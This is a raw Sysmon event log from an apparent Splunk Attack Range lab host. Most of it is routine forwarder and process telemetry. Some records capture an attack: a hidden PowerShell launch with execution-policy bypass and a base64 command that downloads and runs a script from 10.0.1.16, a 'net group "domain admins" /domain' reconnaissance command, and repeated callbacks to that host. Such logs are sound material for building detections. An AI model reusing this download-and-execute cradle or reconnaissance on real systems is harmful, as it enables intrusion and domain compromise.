21:58:14.098{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-8376-613A-D296-03000000C801}6724C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-8376-613A-D296-03000000C801}6724C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.104{B81B27B7-8376-613A-D296-03000000C801}6724C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" group "domain admins" /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 354300x800000000000000035128360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.319{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62144-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.318{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62143-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.314{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62142-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.308{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62141-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.265{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62140-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:15.529{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=174E4DECC5CCAAF46FEDF1C980B4C9D9,SHA256=2C1EE9287AA0C8B11BE16833B6678ADC85309CD17B87F212A16BBAF979801BE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:15.266{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=02EA860C67A4F954D29DC6BBD56B64CA,SHA256=CA6735A74144229CE10614DE3D9AEED77C27B6B65C348A16A229472AABEFEB0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:15.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AE6E78713230E1DE0F4D7DD82273FB0,SHA256=D0C97DB96904D6570F64E254E29E9CCD5280E82585367842886BB2F8E96EEB61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.585{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62145-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:16.549{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A867AEF12396EF720DC07B65FD63221B,SHA256=95DA942DEA764DCCD576F40D05E06E09E48409FD4A9D071208AC2EE881178861,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:17.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=414FE11AA990E216E1E44A4257B27A21,SHA256=664A04916261B6089E6EC96EB45810124BE65C6BABC201E57E3E7EF491D72159,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:42.410{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62146-false10.0.1.12-8000- 23542300x800000000000000035128364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:18.594{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=260DFAB51ADEEED2B0AE8B0E0D77DFD6,SHA256=80A125EB962AEBA1E79203F9C6AA9D4D984DCCB4A31141A77BE615948620306D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:19.595{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5209615A43D889A7F1BA4895C4FF4B39,SHA256=B5A2089FC9DF5A6D50AC18D0F10C415B30D440158CBD3B053F0A7A0D434D5E18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:20.610{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3B84D19F10C9592B76ABE20216C9A40,SHA256=A20383765DA41ABA44A449B2A57585B6CE00109AE614CD5ADA5AB3009440B137,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:46.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62147-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:21.642{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88E5088E7DAE11C5A2211385B0BAB873,SHA256=00C9FB2CC95B44447B924EC17AA153321A5F64439D527C94F760FE779C4EF323,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:21.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6A87B6AA15081FDD40892182D10A7222,SHA256=F5DC4483046C7E2AA2A71D630C2DA162BD580B8E3F861ABC28114C20FBE8B899,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:22.645{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB24D620E40270705089D79F122C4A4,SHA256=05CBE31D6A11C44703ACF4B89C567490A116A15DC59F74CEE0B01242B8753B1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:48.426{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62148-false10.0.1.12-8000- 23542300x800000000000000035128372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:23.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33337B0B4CDCB24C1CE94D803E54D851,SHA256=E9C763F37E4C4A3C46222FDEAB30D44E87ABB4C0A3EB7F7952C87B626765D97F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:24.675{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=772C57C8A042A468154105D34F53E215,SHA256=6FEC2959781E24536F825E6F89171A7B85AE4BE6EE9C88DAC9049F70EDCC7970,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:50.605{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62149-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:25.677{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C732C88CE092F37599A7AB0F79570701,SHA256=91A32545DBEC09BBD4F9BD718E40795665428B6D52095EC560C8A2A7EB43A404,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:25.443{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92477057513F60D72F0E195530C8F010,SHA256=CF38BEA5EAEC9DF644CEB82D348E32FEFBA54D0792CCD1D88A29F462ACE71F15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8382-613A-D496-03000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8382-613A-D496-03000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.845{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8382-613A-D496-03000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.824{B81B27B7-8382-613A-D496-03000000C801}4276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:26.723{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C54B671BB4AEBEB2B0C47D526E1F51C8,SHA256=142394D6960DD231E7EF15AEAA124B4AAC98E7A4974B07CBD8B6198FE13929E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.836{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 